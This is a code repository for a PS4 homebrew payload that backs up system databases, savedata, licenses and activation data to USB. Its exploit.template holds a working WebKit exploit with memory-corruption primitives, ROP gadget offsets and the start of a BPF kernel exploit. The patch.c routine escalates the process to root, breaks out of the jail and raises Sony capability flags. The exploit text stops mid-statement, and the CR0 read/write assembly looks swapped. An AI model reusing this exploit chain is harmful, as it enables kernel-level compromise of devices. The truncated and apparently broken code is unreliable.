├── win-clean.bat
├── win-make.bat
├── .gitattributes
├── tool
    ├── Makefile
    └── bin2js.c
├── clean.sh
├── DB_SG_Backup
    ├── include
    │   └── patch.h
    ├── Makefile
    └── source
    │   ├── patch.c
    │   └── main.c
└── exploit.template


/win-clean.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | bash -c "./clean.sh"
3 | #pause


--------------------------------------------------------------------------------
/win-make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | bash -c "export PS4SDK=~/PS4-SDK && ./build.sh"
3 | pause


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/tool/Makefile:
--------------------------------------------------------------------------------
 1 | all: bin2js
 2 | 
 3 | bin2js: bin2js.c
 4 | 	gcc -o bin2js bin2js.c
 5 | 
 6 | .PHONY: clean
 7 | 
 8 | clean:
 9 | 	rm bin2js
10 | 
11 | 


--------------------------------------------------------------------------------
/clean.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | pushd tool
 3 | make clean
 4 | popd
 5 | pushd DB_SG_Backup
 6 | make clean
 7 | popd
 8 | rm -f html_payload/DB_SG_Backup.html
 9 | rm -f bin/DB_SG_Backup.bin
10 | 
11 | 


--------------------------------------------------------------------------------
/tool/bin2js.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <stdint.h>
 4 | #include <string.h>
 5 | #include <assert.h>
 6 | 
 7 | int main(int argc, char** argv)
 8 | {
 9 |   assert(argc == 2);
10 |   char* fn = argv[1];
11 |   FILE* f = fopen(fn, "r");
12 |   fseek(f, 0, SEEK_END);
13 |   int l = ftell(f);
14 |   int ll = (l + 3) / 4;
15 |   fseek(f, 0, SEEK_SET);
16 |   char *b = malloc(ll * 4);
17 |   memset(b, 0, ll * 4);
18 |   fread(b, l, 1, f);
19 |   fclose(f);
20 |   uint32_t *u = (uint32_t *)b;
21 |   printf("var payload=[");
22 |   for (int i = 0; i < ll; i++)
23 |   {
24 |     printf("%u", *u++);
25 |     if (i < (ll - 1)) printf(",");
26 |   }
27 |   printf("];\n");
28 |   free(b);
29 | }
30 | 
31 | 


--------------------------------------------------------------------------------
/DB_SG_Backup/include/patch.h:
--------------------------------------------------------------------------------
 1 | #ifndef LINK_H
 2 | #define LINK_H
 3 | 
 4 | struct auditinfo_addr {
 5 |     char useless[184];
 6 | };
 7 | 
 8 | struct ucred {
 9 | 	uint32_t useless1;
10 | 	uint32_t cr_uid;     // effective user id
11 | 	uint32_t cr_ruid;    // real user id
12 |  	uint32_t useless2;
13 |     	uint32_t useless3;
14 |     	uint32_t cr_rgid;    // real group id
15 |     	uint32_t useless4;
16 |     	void *useless5;
17 |     	void *useless6;
18 |     	void *cr_prison;     // jail(2)
19 |     	void *useless7;
20 |     	uint32_t useless8;
21 |     	void *useless9[2];
22 |     	void *useless10;
23 |     	struct auditinfo_addr useless11;
24 |     	uint32_t *cr_groups; // groups
25 |     	uint32_t useless12;
26 | };
27 | 
28 | struct filedesc {
29 | 	void *useless1[3];
30 |     	void *fd_rdir;
31 |     	void *fd_jdir;
32 | };
33 | 
34 | struct proc {
35 |     	char useless[64];
36 |     	struct ucred *p_ucred;
37 |     	struct filedesc *p_fd;
38 | };
39 | 
40 | struct thread {
41 |     	void *useless;
42 |     	struct proc *td_proc;
43 | };
44 | 
45 | 
46 | int patcher(struct thread *td);
47 | 
48 | #endif
49 | 


--------------------------------------------------------------------------------
/DB_SG_Backup/Makefile:
--------------------------------------------------------------------------------
 1 | LIBPS4	:=	$(PS4SDK)/libPS4
 2 | 
 3 | CC	:=	gcc
 4 | AS	:=	gcc
 5 | OBJCOPY	:=	objcopy
 6 | ODIR	:=	build
 7 | SDIR	:=	source
 8 | IDIRS	:=	-I$(LIBPS4)/include -I. -Iinclude
 9 | LDIRS	:=	-L$(LIBPS4) -L. -Llib
10 | CFLAGS	:= $(IDIRS) -Os -std=gnu11 -ffunction-sections -fdata-sections -fno-builtin -nostartfiles -nostdlib -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=small -fpie
11 | SFLAGS	:=	-nostartfiles -nostdlib -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
12 | LFLAGS	:=	$(LDIRS) -Xlinker -T $(LIBPS4)/linker.x -Wl,--build-id=none
13 | CFILES	:=	$(wildcard $(SDIR)/*.c)
14 | SFILES	:=	$(wildcard $(SDIR)/*.s)
15 | OBJS	:=	$(patsubst $(SDIR)/%.c, $(ODIR)/%.o, $(CFILES)) $(patsubst $(SDIR)/%.s, $(ODIR)/%.o, $(SFILES))
16 | 
17 | LIBS	:=	-lPS4
18 | 
19 | TARGET = $(shell basename $(CURDIR)).bin
20 | 
21 | $(TARGET): $(ODIR) $(OBJS)
22 | 	$(CC) $(LIBPS4)/crt0.s $(ODIR)/*.o -o temp.t $(CFLAGS) $(LFLAGS) $(LIBS)
23 | 	$(OBJCOPY) -O binary temp.t $(TARGET)
24 | 	rm -f temp.t
25 | 
26 | $(ODIR)/%.o: $(SDIR)/%.c
27 | 	$(CC) -c -o $@ $< $(CFLAGS)
28 | 
29 | $(ODIR)/%.o: $(SDIR)/%.s
30 | 	$(AS) -c -o $@ $< $(SFLAGS)
31 | 
32 | $(ODIR):
33 | 	@mkdir $@
34 | 
35 | .PHONY: clean
36 | 
37 | clean:
38 | 	rm -f $(TARGET) $(ODIR)/*.o
39 | 
40 | 
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/DB_SG_Backup/source/patch.c:
--------------------------------------------------------------------------------
 1 | #include "ps4.h"
 2 | #include "patch.h"
 3 | 
 4 | unsigned int long long __readmsr(unsigned long __register) {
 5 | 	unsigned long __edx;
 6 | 	unsigned long __eax;
 7 | 	__asm__ ("rdmsr" : "=d"(__edx), "=a"(__eax) : "c"(__register));
 8 | 	return (((unsigned int long long)__edx) << 32) | (unsigned int long long)__eax;
 9 | }
10 | 
11 | #define X86_CR0_WP (1 << 16)
12 | 
13 | static inline __attribute__((always_inline)) uint64_t readCr0(void) {
14 | 	uint64_t cr0;
15 | 	
16 | 	asm volatile (
17 | 		"movq %0, %%cr0"
18 | 		: "=r" (cr0)
19 | 		: : "memory"
20 |  	);
21 | 	
22 | 	return cr0;
23 | }
24 | 
25 | static inline __attribute__((always_inline)) void writeCr0(uint64_t cr0) {
26 | 	asm volatile (
27 | 		"movq %%cr0, %0"
28 | 		: : "r" (cr0)
29 | 		: "memory"
30 | 	);
31 | }
32 | 
33 | 
34 | int patcher(struct thread *td){
35 | 
36 | 	struct ucred* cred;
37 | 	struct filedesc* fd;
38 | 
39 | 	fd = td->td_proc->p_fd;
40 | 	cred = td->td_proc->p_ucred;
41 | 
42 | 	void* kernel_base = &((uint8_t*)__readmsr(0xC0000082))[-0x1C0];
43 | 	uint8_t* kernel_ptr = (uint8_t*)kernel_base;
44 | 	void** got_prison0 =   (void**)&kernel_ptr[0x10986A0];
45 | 	void** got_rootvnode = (void**)&kernel_ptr[0x22C1A70];
46 | 
47 | 	cred->cr_uid = 0;
48 | 	cred->cr_ruid = 0;
49 | 	cred->cr_rgid = 0;
50 | 	cred->cr_groups[0] = 0;
51 | 
52 | 	cred->cr_prison = *got_prison0;
53 | 	fd->fd_rdir = fd->fd_jdir = *got_rootvnode;
54 | 
55 | 	// escalate ucred privs, needed for access to the filesystem ie* mounting & decrypting files
56 | 	void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
57 | 	
58 | 	// sceSblACMgrIsSystemUcred
59 | 	uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
60 | 	*sonyCred = 0xffffffffffffffff;
61 | 	
62 | 	// sceSblACMgrGetDeviceAccessType
63 | 	uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
64 | 	*sceProcType = 0x3801000000000013; // Max access
65 | 	
66 | 	// sceSblACMgrHasSceProcessCapability
67 | 	uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
68 | 	*sceProcCap = 0xffffffffffffffff; // Sce Process
69 | 
70 | 	// Disable write protection
71 | 	uint64_t cr0 = readCr0();
72 | 	writeCr0(cr0 & ~X86_CR0_WP);
73 | 
74 | 	// Restore write protection
75 | 	writeCr0(cr0);
76 | 
77 | 	return 0;
78 | }
79 | 
80 | 


--------------------------------------------------------------------------------
/DB_SG_Backup/source/main.c:
--------------------------------------------------------------------------------
  1 | #include "ps4.h"
  2 | #include "patch.h"
  3 | 
  4 | int nthread_run;
  5 | char notify_buf[1024];
  6 | 
  7 | void *nthread_func(void *arg)
  8 | {
  9 |         time_t t1, t2;
 10 |         t1 = 0;
 11 | 	while (nthread_run)
 12 | 	{
 13 | 		if (notify_buf[0])
 14 | 		{
 15 | 			t2 = time(NULL);
 16 | 			if ((t2 - t1) >= 15)
 17 | 			{
 18 | 				t1 = t2;
 19 |                 systemMessage(notify_buf);
 20 | 			}
 21 | 		}
 22 | 		else t1 = 0;
 23 | 		sceKernelSleep(1);
 24 | 	}
 25 | 
 26 | 	return NULL;
 27 | }
 28 | 
 29 | 
 30 | int _main(struct thread *td) {
 31 |       initKernel();
 32 |       initLibc();
 33 |       initPthread();
 34 |       syscall(11,patcher,td);
 35 |       initSysUtil();
 36 |       nthread_run = 1;
 37 |       notify_buf[0] = '\0';
 38 |       ScePthread nthread;
 39 |       scePthreadCreate(&nthread, NULL, nthread_func, NULL, "nthread");
 40 |       int usbdir = open("/mnt/usb0/.dirtest", O_WRONLY | O_CREAT | O_TRUNC, 0777);
 41 |          if (usbdir == -1)
 42 |             {
 43 |                 usbdir = open("/mnt/usb1/.dirtest", O_WRONLY | O_CREAT | O_TRUNC, 0777);
 44 |                 if (usbdir == -1)
 45 |                 {
 46 |                        	copy_File("/system_data/priv/mms/app.db", "/system_data/priv/mms/app.db_backup");
 47 |                         copy_File("/system_data/priv/mms/addcont.db", "/system_data/priv/mms/addcont.db_backup");
 48 |                         copy_File("/system_data/priv/mms/av_content_bg.db", "/system_data/priv/mms/av_content_bg.db_backup");
 49 |                         copy_File("/user/system/webkit/secure/appcache/ApplicationCache.db", "/user/system/webkit/secure/appcache/ApplicationCache.db_backup");
 50 | 						copy_File("/user/system/webkit/webbrowser/appcache/ApplicationCache.db", "/user/system/webkit/webbrowser/appcache/ApplicationCache.db_backup");
 51 |                         systemMessage("Internal backup complete.\nThis was only a database backup use a usb drive for full backup.");
 52 |                         nthread_run = 0;
 53 |                         return 0;
 54 |                 }
 55 |                 else
 56 |                 {
 57 |                         close(usbdir);
 58 |                         systemMessage("Backing up to USB1");
 59 |                         unlink("/mnt/usb1/.dirtest");
 60 |                         mkdir("/mnt/usb1/DB_Dackup/", 0777);
 61 |                         copy_File("/system_data/priv/mms/app.db", "/mnt/usb1/DB_Dackup/app.db");
 62 |                         copy_File("/system_data/priv/mms/addcont.db", "/mnt/usb1/DB_Dackup/addcont.db");
 63 |                         copy_File("/system_data/priv/mms/av_content_bg.db", "/mnt/usb1/DB_Dackup/av_content_bg.db");
 64 |                         mkdir("/mnt/usb1/UserData/", 0777);
 65 |                         mkdir("/mnt/usb1/UserData/system_data/", 0777);
 66 |                         mkdir("/mnt/usb1/UserData/system_data/savedata", 0777);
 67 |                         mkdir("/mnt/usb1/UserData/system_data/priv", 0777);
 68 |                         mkdir("/mnt/usb1/UserData/system_data/priv/home", 0777);
 69 |                         mkdir("/mnt/usb1/UserData/system_data/priv/license", 0777);
 70 |                         mkdir("/mnt/usb1/UserData/system_data/priv/activation", 0777);
 71 |                         mkdir("/mnt/usb1/UserData/user/", 0777);
 72 |                         mkdir("/mnt/usb1/UserData/user/home/", 0777);
 73 |                         mkdir("/mnt/usb1/UserData/user/trophy", 0777);
 74 |                         mkdir("/mnt/usb1/UserData/user/license", 0777);
 75 |                         mkdir("/mnt/usb1/UserData/user/settings", 0777);
 76 | 						mkdir("/mnt/usb1/UserData/user/system", 0777);					
 77 | 						mkdir("/mnt/usb1/UserData/user/system/webkit", 0777);
 78 | 						mkdir("/mnt/usb1/UserData/user/system/webkit/secure", 0777);
 79 | 						mkdir("/mnt/usb1/UserData/user/system/webkit/webbrowser", 0777);
 80 |                         sprintf(notify_buf, "Copying: User Data\nPlease wait.");
 81 |                         copy_Dir("/system_data/savedata","/mnt/usb1/UserData/system_data/savedata");
 82 |                         copy_Dir("/user/home", "/mnt/usb1/UserData/user/home");
 83 |                         copy_Dir("/user/trophy", "/mnt/usb1/UserData/user/trophy");
 84 |                         copy_Dir("/user/license", "/mnt/usb1/UserData/user/license");
 85 |                         copy_Dir("/user/settings", "/mnt/usb1/UserData/user/settings");
 86 | 						copy_Dir("/user/system/webkit/secure","/mnt/usb1/UserData/user/system/webkit/secure");
 87 | 						copy_Dir("/user/system/webkit/webbrowser","/mnt/usb1/UserData/user/system/webkit/webbrowser");
 88 |                         copy_Dir("/system_data/priv/home","/mnt/usb1/UserData/system_data/priv/home");
 89 |                         copy_Dir("/system_data/priv/license","/mnt/usb1/UserData/system_data/priv/license");
 90 |                         copy_Dir("/system_data/priv/activation","/mnt/usb1/UserData/system_data/priv/activation");
 91 |                         notify_buf[0] = '\0';
 92 |                         nthread_run = 0;
 93 |                         systemMessage("USB Backup Complete.");
 94 |                 }
 95 |             }
 96 |             else
 97 |             {
 98 |                         close(usbdir);
 99 |                         systemMessage("Backing up to USB0");
100 |                         unlink("/mnt/usb0/.dirtest");
101 |                         mkdir("/mnt/usb0/DB_Dackup/", 0777);
102 |                         copy_File("/system_data/priv/mms/app.db", "/mnt/usb0/DB_Dackup/app.db");
103 |                         copy_File("/system_data/priv/mms/addcont.db", "/mnt/usb0/DB_Dackup/addcont.db");
104 |                         copy_File("/system_data/priv/mms/av_content_bg.db", "/mnt/usb0/DB_Dackup/av_content_bg.db");
105 |                         mkdir("/mnt/usb0/UserData/", 0777);
106 |                         mkdir("/mnt/usb0/UserData/system_data/", 0777);
107 |                         mkdir("/mnt/usb0/UserData/system_data/savedata", 0777);
108 |                         mkdir("/mnt/usb0/UserData/system_data/priv", 0777);
109 |                         mkdir("/mnt/usb0/UserData/system_data/priv/home", 0777);
110 |                         mkdir("/mnt/usb0/UserData/system_data/priv/license", 0777);
111 |                         mkdir("/mnt/usb0/UserData/system_data/priv/activation", 0777);
112 |                         mkdir("/mnt/usb0/UserData/user/", 0777);
113 |                         mkdir("/mnt/usb0/UserData/user/home/", 0777);
114 |                         mkdir("/mnt/usb0/UserData/user/trophy", 0777);
115 |                         mkdir("/mnt/usb0/UserData/user/license", 0777);
116 |                         mkdir("/mnt/usb0/UserData/user/settings", 0777);
117 | 						mkdir("/mnt/usb0/UserData/user/system", 0777);					
118 | 						mkdir("/mnt/usb0/UserData/user/system/webkit", 0777);
119 | 						mkdir("/mnt/usb0/UserData/user/system/webkit/secure", 0777);
120 | 						mkdir("/mnt/usb0/UserData/user/system/webkit/webbrowser", 0777);
121 |                         sprintf(notify_buf, "Copying: User Data\nPlease wait.");
122 |                         copy_Dir("/system_data/savedata","/mnt/usb0/UserData/system_data/savedata");
123 |                         copy_Dir("/user/home", "/mnt/usb0/UserData/user/home");
124 |                         copy_Dir("/user/trophy", "/mnt/usb0/UserData/user/trophy");
125 |                         copy_Dir("/user/license", "/mnt/usb0/UserData/user/license");
126 |                         copy_Dir("/user/settings", "/mnt/usb0/UserData/user/settings");
127 | 						copy_Dir("/user/system/webkit/secure","/mnt/usb0/UserData/user/system/webkit/secure");
128 | 						copy_Dir("/user/system/webkit/webbrowser","/mnt/usb0/UserData/user/system/webkit/webbrowser");
129 |                         copy_Dir("/system_data/priv/home","/mnt/usb0/UserData/system_data/priv/home");
130 |                         copy_Dir("/system_data/priv/license","/mnt/usb0/UserData/system_data/priv/license");
131 |                         copy_Dir("/system_data/priv/activation","/mnt/usb0/UserData/system_data/priv/activation");
132 |                         notify_buf[0] = '\0';
133 |                         nthread_run = 0;
134 |                         systemMessage("USB Backup Complete.");
135 |             }
136 |     
137 |     return 0;
138 | }
139 | 
140 | 
141 | 


--------------------------------------------------------------------------------
/exploit.template:
--------------------------------------------------------------------------------
1 | <!DOCTYPE html><html><head><title>#NAME#</title><meta name=viewport content="width=device-width, initial-scale=1"><style>.loader{position:absolute;left:50%;top:50%;margin:-75px 0 0 -75px;border:10px solid #f3f3f3;border-radius:50%;border-top:10px solid #044595;border-left:10px solid #044595;width:120px;height:120px;-webkit-animation:spin 1s linear infinite}.info{overflow:hidden;position:fixed;position:absolute;top:50%;left:50%;font-size:45px;font-family:sans-serif;transform:translate(-50%,-50%)}.credits{overflow:hidden;position:fixed;position:absolute;top:90%;left:50%;font-size:16px;font-family:sans-serif;text-align:center;transform:translate(-50%,-90%)}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}</style></head><body style=margin:0><div id=loader class=loader></div><div id=done class=info style=display:none>#NAME# loaded.</div><div id=fail class=info style=display:none>Failed to load #NAME#!</div><div id=footer class=credits><ul style=list-style:none;padding-left:0><li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li>anonymous contributors</li></ul></div><script>var p;var s={};var g={};var gc={"pop_r8":96709,"pop_r9":12268047,"pop_rax":17397,"pop_rcx":339545,"pop_rdx":1826852,"pop_rsi":586634,"pop_rdi":232890,"pop_rsp":124551,"jmp_rax":130,"jmp_rdi":2711166,"mov_rdx_rax":3488561,"mov_rdi_rax":22692143,"mov_rax_rdx":1896224,"mov_rbp_rsp":985418,"mov__rdi__rax":3857131,"mov__rdi__rsi":146114,"mov__rax__rsi":2451047,"mov_rax__rax__":444474,"mov_rax__rdi__":290553,"add_rax_rsi":1384646,"and_rax_rsi":22481823,"add_rdi_rax":5593055,"jop":800720,"ret":60,"stack_chk_fail":200,"setjmp":5368};window.onload=function(){setTimeout(exploit,3000);};window.onerror=function(e){document.getElementById("loader").style.display="none";document.getElementById("fail").style.display="block";if(e.startsWith("Error:")==true){alert(e);}else{location.reload();};};function done(){document.getElementById("loader").style.display="none";document.getElementById("done").style.display="block";};var rop=function(){this.stack=new Uint32Array(65536);this.stackBase=p.read8(p.leakval(this.stack).add32(16));this.count=0;this.clear=function(){this.count=0;this.runtime=undefined;for(var i=0;i<4080/2;i++){p.write8(this.stackBase.add32(i*8),0);};};this.pushSymbolic=function(){this.count++;return this.count-1;};this.finalizeSymbolic=function(idx,val){p.write8(this.stackBase.add32(idx*8),val);};this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(),val);};this.push_write8=function(where,what){this.push(g.pop_rdi);this.push(where);this.push(g.pop_rsi);this.push(what);this.push(g.mov__rdi__rsi);};this.fcall=function(rip,rdi,rsi,rdx,rcx,r8,r9){if(rdi!=undefined){this.push(g.pop_rdi);this.push(rdi);};if(rsi!=undefined){this.push(g.pop_rsi);this.push(rsi);};if(rdx!=undefined){this.push(g.pop_rdx);this.push(rdx);};if(rcx!=undefined){this.push(g.pop_rcx);this.push(rcx);};if(r8!=undefined){this.push(g.pop_r8);this.push(r8);};if(r9!=undefined){this.push(g.pop_r9);this.push(r9);};this.push(rip);return this;};this.run=function(){var retv=p.loadchain(this,this.notimes);this.clear();return retv;};return this;};function makeid(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<8;i++){text+=possible.charAt(Math.floor(Math.random()*possible.length));};return text;};var instancespr=[];for(var i=0;i<4096;i++){instancespr[i]=new Uint32Array(1);instancespr[i][makeid()]=50057;};var _dview;function u2d(low,hi){if(!_dview)_dview=new DataView(new ArrayBuffer(16));_dview.setUint32(0,hi);_dview.setUint32(4,low);return _dview.getFloat64(0);};function zeroFill(number,width){width-=number.toString().length;if(width>0){return new Array(width+(/\./.test(number)?2:1)).join("0")+number;};return number+"";};function int64(low,hi){this.low=(low>>>0);this.hi=(hi>>>0);this.add32=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};return new int64(new_lo,new_hi);};this.add32inplace=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};this.hi=new_hi;this.low=new_lo;};this.sub32=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};return new int64(new_lo,new_hi);};this.sub32inplace=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};this.hi=new_hi;this.low=new_lo;};this.toString=function(val){val=16;var lo_str=(this.low>>>0).toString(val);var hi_str=(this.hi>>>0).toString(val);if(this.hi==0)return lo_str;else{lo_str=zeroFill(lo_str,8);};return hi_str+lo_str;};return this;};var nogc=[];var tgt={a:0,b:0,c:0,d:0};var y=new ImageData(1,16384);postMessage("","*",[y.data.buffer]);var props={};for(var i=0;i<16384/2;){props[i++]={value:1111638594};props[i++]={value:tgt};};var foundLeak=undefined;var foundIndex=0;var maxCount=256;while(foundLeak==undefined&&maxCount>0){maxCount--;history.pushState(y,"");Object.defineProperties({},props);var leak=new Uint32Array(history.state.data.buffer);for(var i=0;i<leak.length-6;i++){if(leak[i]==1111638594&&leak[i+1]==4294901760&&leak[i+2]==0&&leak[i+3]==0&&leak[i+4]==0&&leak[i+5]==0&&leak[i+6]==14&&leak[i+7]==0&&leak[i+10]==0&&leak[i+11]==0&&leak[i+12]==0&&leak[i+13]==0&&leak[i+14]==14&&leak[i+15]==0){foundIndex=i;foundLeak=leak;break;};};};if(!foundLeak){throw new Error("infoleak fail");};Array.prototype.__defineGetter__(100,()=>1);var firstLeak=Array.prototype.slice.call(foundLeak,foundIndex,foundIndex+64);var leakJSVal=new int64(firstLeak[8],firstLeak[9]);var f=document.body.appendChild(document.createElement("iframe"));var a=new f.contentWindow.Array(13.37,13.37);var b=new f.contentWindow.Array(u2d(leakJSVal.low+16,leakJSVal.hi),13.37);var master=new Uint32Array(4096);var slave=new Uint32Array(4096);var leakval_u32=new Uint32Array(4096);var leakval_helper=[slave,2,3,4,5,6,7,8,9,10];tgt.a=u2d(2048,23077632);tgt.b=0;tgt.c=leakval_helper;tgt.d=4919;var c=Array.prototype.concat.call(a,b);document.body.removeChild(f);var hax=c[0];c[0]=0;tgt.c=c;hax[2]=0;hax[3]=0;Object.defineProperty(Array.prototype,100,{get:undefined});tgt.c=leakval_helper;var butterfly=new int64(hax[2],hax[3]);butterfly.low+=16;tgt.c=leakval_u32;var lkv_u32_old=new int64(hax[4],hax[5]);hax[4]=butterfly.low;hax[5]=butterfly.hi;tgt.c=master;hax[4]=leakval_u32[0];hax[5]=leakval_u32[1];var a2sb=new int64(master[4],master[5]);tgt.c=leakval_u32;hax[4]=lkv_u32_old.low;hax[5]=lkv_u32_old.hi;tgt.c=0;hax=0;var p={write8:function(addr,val){master[4]=addr.low;master[5]=addr.hi;if(val instanceof int64){slave[0]=val.low;slave[1]=val.hi;}else{slave[0]=val;slave[1]=0;};master[4]=a2sb.low;master[5]=a2sb.hi;},write4:function(addr,val){master[4]=addr.low;master[5]=addr.hi;slave[0]=val;master[4]=a2sb.low;master[5]=a2sb.hi;},read8:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=new int64(slave[0],slave[1]);master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},read4:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=slave[0];master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},leakval:function(jsval){leakval_helper[0]=jsval;var rtv=this.read8(butterfly);this.write8(butterfly,new int64(1094795585,4294901760));return rtv;}};var get_jmptgt=function(addr){var z=p.read4(addr)&65535;var y=p.read4(addr.add32(2));if(z!=9727)return 0;return addr.add32(y+6);};var exploit=function(){p.leakfunc=function(func){var fptr_store=p.leakval(func);return(p.read8(fptr_store.add32(24))).add32(64);};var parseFloatStore=p.leakfunc(parseFloat);var webKitBase=p.read8(parseFloatStore);webKitBase.low&=4294963200;webKitBase.sub32inplace(5881856-147456);var o2wk=function(o){return webKitBase.add32(o);};for(var gn in gc){if(gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};};var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail));libKernelBase.low&=4294963200;libKernelBase.sub32inplace(53248+16384);var wkview=new Uint8Array(4096);var wkstr=p.leakval(wkview).add32(16);p.write8(wkstr,webKitBase);p.write4(wkstr.add32(8),57131008);var hold1;var hold2;var holdz;var holdz1;while(1){hold1={a:0,b:0,c:0,d:0};hold2={a:0,b:0,c:0,d:0};holdz1=p.leakval(hold2);holdz=p.leakval(hold1);if(holdz.low-48==holdz1.low)break;};var pushframe=[];pushframe.length=128;var funcbuf;var funcbuf32=new Uint32Array(256);nogc.push(funcbuf32);var launch_chain=function(chain){var stackPointer=0;var stackCookie=0;var orig_reenter_rip=0;var reenter_help={length:{valueOf:function(){orig_reenter_rip=p.read8(stackPointer);stackCookie=p.read8(stackPointer.add32(8));var returnToFrame=stackPointer;var ocnt=chain.count;chain.push_write8(stackPointer,orig_reenter_rip);chain.push_write8(stackPointer.add32(8),stackCookie);if(chain.runtime)returnToFrame=chain.runtime(stackPointer);chain.push(g.pop_rsp);chain.push(returnToFrame);chain.count=ocnt;p.write8(stackPointer,(g.pop_rsp));p.write8(stackPointer.add32(8),chain.stackBase);}}};funcbuf=p.read8(p.leakval(funcbuf32).add32(16));p.write8(funcbuf.add32(48),g.setjmp);p.write8(funcbuf.add32(128),g.jop);p.write8(funcbuf,funcbuf);p.write8(parseFloatStore,g.jop);var orig_hold=p.read8(holdz1);var orig_hold48=p.read8(holdz1.add32(72));p.write8(holdz1,funcbuf.add32(80));p.write8(holdz1.add32(72),funcbuf);parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);p.write8(holdz1,orig_hold);p.write8(holdz1.add32(72),orig_hold48);stackPointer=p.read8(funcbuf.add32(16));rtv=Array.prototype.splice.apply(reenter_help);return p.leakval(rtv);};p.loadchain=launch_chain;var kview=new Uint8Array(4096);var kstr=p.leakval(kview).add32(16);p.write8(kstr,libKernelBase);p.write4(kstr.add32(8),262144);var countbytes;for(var i=0;i<262144;i++){if(kview[i]==114&&kview[i+1]==100&&kview[i+2]==108&&kview[i+3]==111&&kview[i+4]==99){countbytes=i;break;};};p.write4(kstr.add32(8),countbytes+32);var dview32=new Uint32Array(1);var dview8=new Uint8Array(dview32.buffer);for(var i=0;i<countbytes;i++){if(kview[i]==72&&kview[i+1]==199&&kview[i+2]==192&&kview[i+7]==73&&kview[i+8]==137&&kview[i+9]==202&&kview[i+10]==15&&kview[i+11]==5){dview8[0]=kview[i+3];dview8[1]=kview[i+4];dview8[2]=kview[i+5];dview8[3]=kview[i+6];var syscallno=dview32[0];s[syscallno]=libKernelBase.add32(i);};};var chain=new rop();var returnvalue;p.fcall_=function(rip,rdi,rsi,rdx,rcx,r8,r9){chain.clear();chain.notimes=this.next_notime;this.next_notime=1;chain.fcall(rip,rdi,rsi,rdx,rcx,r8,r9);chain.push(g.pop_rdi);chain.push(chain.stackBase.add32(16376));chain.push(g.mov__rdi__rax);chain.push(g.pop_rax);chain.push(p.leakval(1094795842));if(chain.run().low!=1094795842){throw new Error("unexpected rop behaviour");};returnvalue=p.read8(chain.stackBase.add32(16376));};p.fcall=function(){p.fcall_.apply(this,arguments);return returnvalue;};p.readstr=function(addr){var addr_=addr.add32(0);var rd=p.read4(addr_);var buf="";while(rd&255){buf+=String.fromCharCode(rd&255);addr_.add32inplace(1);rd=p.read4(addr_);};return buf;};p.syscall=function(sysc,rdi,rsi,rdx,rcx,r8,r9){if(typeof sysc!="number"){throw new Error("invalid syscall");};var off=s[sysc];if(off==undefined){throw new Error("invalid syscall");};return p.fcall(off,rdi,rsi,rdx,rcx,r8,r9);};p.sptr=function(str){var bufView=new Uint8Array(str.length+1);for(var i=0;i<str.length;i++){bufView[i]=str.charCodeAt(i)&255;};nogc.push(bufView);return p.read8(p.leakval(bufView).add32(16));};p.malloc=function(sz){var backing=new Uint8Array(65536+sz);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=backing;return ptr;};p.malloc32=function(sz){var backing=new Uint8Array(65536+sz*4);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=new Uint32Array(backing.buffer);return ptr;};var test=p.syscall(23,0);if(test!="0"){var fd=p.syscall(5,p.sptr("/dev/bpf0"),2).low;var fd1=p.syscall(5,p.sptr("/dev/bpf0"),2).low;if(fd==(-1>>>0)){throw new Error("open bpf fail");};var bpf_valid=p.malloc32(16384);var bpf_spray=p.malloc32(16384);var bpf_valid_u32=bpf_valid.backing;var bpf_valid_prog=p.malloc(64);p.write8(bpf_valid_prog,2048/8);p.write8(bpf_valid_prog.add32(8),bpf_valid);var bpf_spray_prog=p.malloc(64);p.write8(bpf_spray_prog,2048/8);p.write8(bpf_spray_prog.add32(8),bpf_spray);for(var i=0;i<1024;){bpf_valid_u32[i++]=6;bpf_valid_u32[i++]=0;};var rtv=p.syscall(54,fd,2148549243,bpf_valid_prog);if(rtv.low!=0){throw new Error("ioctl bpf fail");};var spawnthread=function(name,chain){var longjmp=webKitBase.add32(5352);var createThread=webKitBase.add32(7836560);var contextp=p.malloc32(8192);var contextz=contextp.backing;contextz[0]=1337;var thread2=new 